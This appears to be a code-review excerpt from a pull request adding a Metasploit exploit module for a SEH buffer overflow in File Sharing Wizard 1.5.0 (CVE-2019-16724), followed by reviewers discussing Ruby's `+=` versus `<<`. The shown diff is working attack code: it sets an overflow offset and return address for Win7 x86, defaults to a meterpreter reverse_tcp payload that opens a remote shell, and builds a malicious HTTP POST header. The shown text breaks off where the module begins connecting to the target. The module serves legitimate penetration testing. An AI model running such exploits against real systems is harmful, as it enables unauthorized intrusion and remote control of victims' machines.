modules/exploits/windows/http/file_sharing_wizard_seh.rb

```diff
@@ -0,0 +1,57 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Seh
+
+  def initialize(info = {})
+    super update_info(info,
+                      'Name' => 'File Sharing Wizard 1.5.0 - POST SEH Overflow',
+                      'Description' => %q(
+        This module exploits a SEH based buffer overflow in an HTTP POST parameter in File Sharing Wizard 1.5.0
+      ),
+                      'Author' => [
+                        'x00pwn', # Original exploit
+                        'Dean Welch <dean_welch[at]rapid7.com>' # Module
+                      ],
+                      'License'        => MSF_LICENSE,
+                      'References'     =>
+                          [
+                            %w(CVE 2019-16724),
+                            %w(EDB 47412)
+                          ],
+                      'Payload' =>
+                          {
+                            BadChars: "\x00\x20"
+                          },
+                      'DisclosureDate' => '2019-09-24',
+                      'DefaultOptions' =>
+                          {
+                            RPORT: "80",
+                            PAYLOAD: 'windows/meterpreter/reverse_tcp'
+                          },
+                      'Platform'       => 'win',
+                      'Targets'        =>
+                          [
+                            ['Win7 x86', { 'Offset' => 1040, 'Ret' => 0x7c38a67f }]
+                          ])
+  end
+
+  def exploit
+    buf = rand_text_english(target['Offset'], payload_badchars)
+    buf << generate_seh_payload(target.ret)
+    payload_header = "POST " + buf
+    payload_header += " HTTP/1.0\r\n\r\n"
+    print_status("Connecting to target")
```

Comment:
Minor thing: you used `+=` and `<<` both here, but I think `<<` is what you want across the board in this case.  If you, like me, are not a ruby god and would like more info on how Ruby likes to play games with pointers behind the scenes:
https://medium.com/@AdamLombard/easy-ruby-plus-equals-vs-shovel-6f030875e366

Reply:
I used `+=` by accident the other day because I had been writing Python. It happens! But yeah, `<<` will be more efficient.

Reply:
yup meant to be a << had them all as += at first (copy paste from the poc) and missed this one